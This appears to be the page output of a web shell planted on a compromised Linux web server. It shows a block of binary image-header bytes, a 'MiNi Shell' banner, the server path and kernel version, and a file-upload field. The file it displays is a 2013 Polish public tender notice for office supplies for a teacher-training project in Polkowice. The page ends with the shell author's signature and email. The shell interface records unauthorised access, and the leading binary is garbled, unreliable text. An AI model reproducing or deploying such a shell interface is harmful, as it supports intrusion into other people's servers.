JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131011/414550-N-2013.html

<p class="kh_header"><b>Polkowice: Sprzedaż i sukcesywne dostarczanie materiałów biurowych, 
w ramach realizacji projektu Nowa jakość systemu doskonalenia nauczycieli w powiecie polkowickim współfinansowanego ze środków Unii Europejskiej
w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 414550 - 2013; data zamieszczenia: 11.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Ośrodek Poradnictwa Psychologiczno-Pedagogicznego i Doradztwa Metodycznego w Polkowicach , ul. Targowa 1, 59-100 Polkowice, woj. dolnośląskie, tel. 76 746 15 70, faks 76 746 15 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.polkowice.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż i sukcesywne dostarczanie materiałów biurowych, 
w ramach realizacji projektu Nowa jakość systemu doskonalenia nauczycieli w powiecie polkowickim współfinansowanego ze środków Unii Europejskiej
w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sprzedaż i sukcesywne dostarczanie materiałów biurowych, w ramach realizacji projektu Nowa jakość systemu doskonalenia nauczycieli w powiecie polkowickim. 1.1. Szczegółowy rodzaj oraz ilości zamawianych materiałów biurowych: 1). Zakładki indeksujące 10 opak. papierowe, 4 kolory, 20x 50 mm (opak. 4x50 szt.); 2). Kartki samoprzylepne 10 opak. papierowe, kilka kolorów, 76x76 mm (opak. 100 szt.); 3). Długopisy 30 szt. automatyczne, szerokość linii pisania 0,3-0,4 mm, niebieski wkład; 4). Ołówki 10 szt. ołówek grafitowy, HB, z gumką; 5). Gumki 3 szt. gumka przeznaczona do ścierania ołówków grafitowych, duża; 6). Temperówki 3 szt. z pojemnikiem na wióry, przeznaczona do temperowania ołówków grafitowych; 7). Zakreślacz typu Steadtler, Stabilo lub równoważny 5 opak. do stosowania na każdym rodzaju papieru, na bazie wody, w etui - 4 kolory; 8) Marker permanentny 3 szt. olejowy, bez Xylenu, do pisania na każdej powierzchni, czarny; 9) Marker do płyt CD typu Edding 8400 lub równoważny 3 szt. z trwałym, niezmywalnym tuszem, do płyt CD/DVD; 10) Linijka 3 szt. metalowa, 30 cm; 11) Klej w sztyfcie 3 szt. do klejenia papieru, ok. 35 g (+/- 5g;) 12) Taśma klejąca 6 szt. samoprzylepna, szer. 15 mm x dł. 10 m, przezroczysta, uniwersalna; 13) Skoroszyt oczko 1/2 30 szt. tektura, wewnątrz metalowy wąs umieszczony w dodatkowym pasku tektury; 14) Koszulki 3 opak. przezroczyste, krystaliczne, A4, op. 100 szt.; 15) Listwy zaciskające A4 22 opak. do wpinania do segregatora 4 mm, op. 10 szt; 16) Płyty CD 59 opak. płyty CD, opakowanie zbiorcze 50 szt.; 17) Koperty na CD 2900 szt. papierowe; 18) Dziurkacz duży typu Sax 518 lub równoważny 1 szt. metalowy mechanizm, metalowa obudowa, dziurkujący 40 kartek; 19) Dziurkacze małe typu Sax 406 lub równoważny 2 szt. metalowy mechanizm, metalowa obudowa, dziurkujące 30 kartek; 20) Zszywacz 3 szt. metalowy mechanizm, zszywający do 25 kartek, na zszywki 24/6; 21) Zszywki do zszywacza 5 opak. stalowe, galwanizowane 24/6, opak. 1000 szt.; 22) Spinacze op. 100 szt. 5 opak. okrągłe, galwanizowane, rozmiar 33; 23) Rozszywacz 3 szt. metalowy z plastikową obudową; 24) Przybornik 3 szt. min. 3 przegrody na akcesoria piszące; 25) Nożyczki 2 szt. ze stali nierdzewnej, 16 cm (+/- 1 cm), uchwyt ergonomiczny 26) Datownik 1 szt. samotuszujący cyfrowy, czarny tusz; 27) Pieczątka + wykonanie 1 szt. na kołysce, 120x80 mm, na drewnianym klocku; 28) Pieczątki imienne + wykonanie 4 szt. 40x15 mm, dwie linijki tekstu + miejsce na podpis; 29) Pieczątka projektu + wykonanie 1 szt. 70x25 mm; 30) Szufladki plastikowe 9 szt. na dokumenty; 31) Kalkulatory 3 szt. 10-cio pozycyjny wyświetlacz, podwójne zasilanie, klawisz cofania; 32) Koszulki na CD/DVD 5 opak. do wpięcia do segregatora, op. 5 szt.; 33) Papier ksero 2320 ryz typu Pol Speed lub równoważny, 80g/m2; 34) Segregatory 70 szt. PPA4/75 dźwignia mechanizmu z dociskiem, dolna listwa wzmacniająca; 35) Segregatory 10 szt. PPA4/50 dźwignia mechanizmu z dociskiem, dolna listwa wzmacniająca; 36) Tusz do drukarki HP OfficeJet Pro 8100 19 kompl. komplet tuszu oryginalnego, czarny + 3 kolory, zgodnie   z parametrami producenta, nie powodujące utraty gwarancji  urządzenia; 37) Papier samoprzylepny 1 opak. format A4, biały op. 100 szt.; 38) Toner do kserokopiarki Kyocera TaskAlfa 180 50 szt. czarny, oryginalny, z hologramem Kyocera, nie powodujący utraty gwarancji urządzenia; 39) Papier na certyfikaty, zaświadczenia 152 opak. karton ozdobny A4, płótno, kość słoniowa, 220g/m2 (+/- 30g), 1 opak. - 20 arkuszy; 40) Okładki przezroczyste do bindownicy 32 opak. bezbarwne - opakowanie 100 szt.; 41) Okładki karton do bindownicy 32 opak. opakowanie 100 szt.; 42) Grzbiety do bindownicy 30 opak. plastikowe, 6 mm, opakowanie 100 szt. 1.2. Wskazane w pkt. 1.1. ilości są prognozowanym zapotrzebowaniem Zamawiającego w okre?sie realizacji, tj. od października 2013 r. do grudnia 2014 r. 2. Szczegółowe wymagania związane z realizacją przedmiotu zamówienia: 2.1. Wykonawca zobowiązuje się wykonać przedmiot zamówienia zgodnie z wszystkimi wymaganiami Zamawiającego wskazanymi w niniejszym opisie przedmiotu zamówienia. 2.2.Rozliczenia pomiędzy Zamawiającym a Wykonawcą będą następowały po każdym zrealizowanym prawidłowo zleceniu, według cen jednostkowych przedstawionych w ofercie, na podstawie faktycznie zrealizowanych dostaw. 2.3. Zamawiający zastrzega sobie prawo do dokonania przesunięć ilościowych pomiędzy pozycjami wyszczególnionymi w załączniku nr 1. Wartość dokonanych przesunięć nie może przekroczyć 20 % ceny oferty wybranej w postępowaniu jako oferta najkorzystniejsza. 2.4. Zamawiający zastrzega sobie prawo do zamiany wyszczególnionego w załączniku nr 1 asortymentu na inne typowe materiały biurowe. Wartość powyższej zamiany, nie może przekroczyć 20% ceny oferty wybranej w postępowaniu jako oferta najkorzystniejsza. Wskazane w pkt. 1. SIWZ ilości są prognozowanym zapotrzebowaniem Zamawiającego w okre?sie realizacji, tj. od października 2013 r. do grudnia 2014 r. Rozliczenia pomiędzy Wykonawcą a Zamawiającym dokonywane będą na podstawie faktycznie zakupionych przez Zamawiającego ilości artykułów biurowych. 2.5. Dostawy będą realizowane sukcesywnie na podstawie zleceń Zamawiającego, nie później jednak niż do grudnia 2014 r. 2.6. Zamawiający w zleceniu wskaże zamawiane produkty oraz ich ilość. 2.7. Przedmiot konkretnego zlecenia zostanie wydany Zamawiającemu w terminie do 2 dni od otrzymania przez Wykonawcę zlecenia. 2.8. Zapłata należności nastąpi przelewem na konto Dostawcy w terminie do 14 dni od dnia otrzymania faktury przez Zamawiającego, z zastrzeżeniem, że termin płatności ulegnie przesunięciu do czasu otrzymania transzy (dotacji) z Instytucji Pośredniczącej II stopnia. Zamawiający wówczas nie pozostaje w zwłoce.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>wartość zamówienia uzupełniającego wynosi 20% zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku  Wykonawca winien wskazać, że brak jest podstaw do jego wykluczenia z postępowania na podstawie art. 24 ust. 1 i ust.
2 ustawy Pzp poprzez przedłożenie dokumentów określonych  w punkcie 4.1.2 SIWZ. 
Ocena spełnienia warunków zostanie dokonana na zasadzie spełnia / nie spełnia w oparciu  
o treść złożonych dokumentów i oświadczeń. W przypadku nie spełnienia warunków udziału, Wykonawca zostanie wykluczony z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku  Wykonawca winien wskazać, że brak jest podstaw do jego wykluczenia z postępowania na podstawie art. 24 ust. 1 i ust.
2 ustawy Pzp poprzez przedłożenie dokumentów określonych  w punkcie 4.1.2 SIWZ. 
Ocena spełnienia warunków zostanie dokonana na zasadzie spełnia / nie spełnia w oparciu  
o treść złożonych dokumentów i oświadczeń. W przypadku nie spełnienia warunków udziału, Wykonawca zostanie wykluczony z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku  Wykonawca winien wskazać, że brak jest podstaw do jego wykluczenia z postępowania na podstawie art. 24 ust. 1 i ust.
2 ustawy Pzp poprzez przedłożenie dokumentów określonych  w punkcie 4.1.2 SIWZ. 
Ocena spełnienia warunków zostanie dokonana na zasadzie spełnia / nie spełnia w oparciu  
o treść złożonych dokumentów i oświadczeń. W przypadku nie spełnienia warunków udziału, Wykonawca zostanie wykluczony z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku  Wykonawca winien wskazać, że brak jest podstaw do jego wykluczenia z postępowania na podstawie art. 24 ust. 1 i ust.
2 ustawy Pzp poprzez przedłożenie dokumentów określonych  w punkcie 4.1.2 SIWZ. 
Ocena spełnienia warunków zostanie dokonana na zasadzie spełnia / nie spełnia w oparciu  
o treść złożonych dokumentów i oświadczeń. W przypadku nie spełnienia warunków udziału, Wykonawca zostanie wykluczony z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku  Wykonawca winien wskazać, że brak jest podstaw do jego wykluczenia z postępowania na podstawie art. 24 ust. 1 i ust.
2 ustawy Pzp poprzez przedłożenie dokumentów określonych  w punkcie 4.1.2 SIWZ. 
Ocena spełnienia warunków zostanie dokonana na zasadzie spełnia / nie spełnia w oparciu  
o treść złożonych dokumentów i oświadczeń. W przypadku nie spełnienia warunków udziału, Wykonawca zostanie wykluczony z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty (załącznik nr 1 do SIWZ) Wykonawcy są zobowiązani dołączyć, poza w/w dokumentami potwierdzającymi spełnianie warunków podmiotowych, także pełnomocnictwo, jeżeli zachodzą okoliczności powodujące konieczność dołączenia do oferty takiego dokumentu</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany umowy wymagają dla swej ważności aneksu w formie pisemnej pod rygorem nieważności. Istotne zmiany umowy mogą nastąpić między innymi w następujących sytuacjach: 
1. zmiana ilości i asortymentu, jak w pkt 2.2.3 i 2.2.4 SIWZ.

Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę.  
Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 
Nie stanowi zmiany umowy w rozumieniu ustawy Pzp:
1) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana 
nr rachunku bankowego),
2) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami,
3) udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych,
4) udzielenie zamówień uzupełniających w zakresie wskazanym w specyfikacji istotnych warunków zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://popppidm.bipstrona.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Ośrodek Poradnictwa Psychologiczno - Pedagogicznego i Doradztwa Metodycznego w Polkowicach, ul. Targowa 1, 59-100 Polkowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2013 godzina 08:00, miejsce: Powiatowy Ośrodek Poradnictwa Psychologiczno  Pedagogicznego i Doradztwa Metodycznego w Polkowicach, ul. Targowa 1, 59 - 100 Polkowice (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Nowa jakość systemu doskonalenia nauczycieli w powiecie polkowickim współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com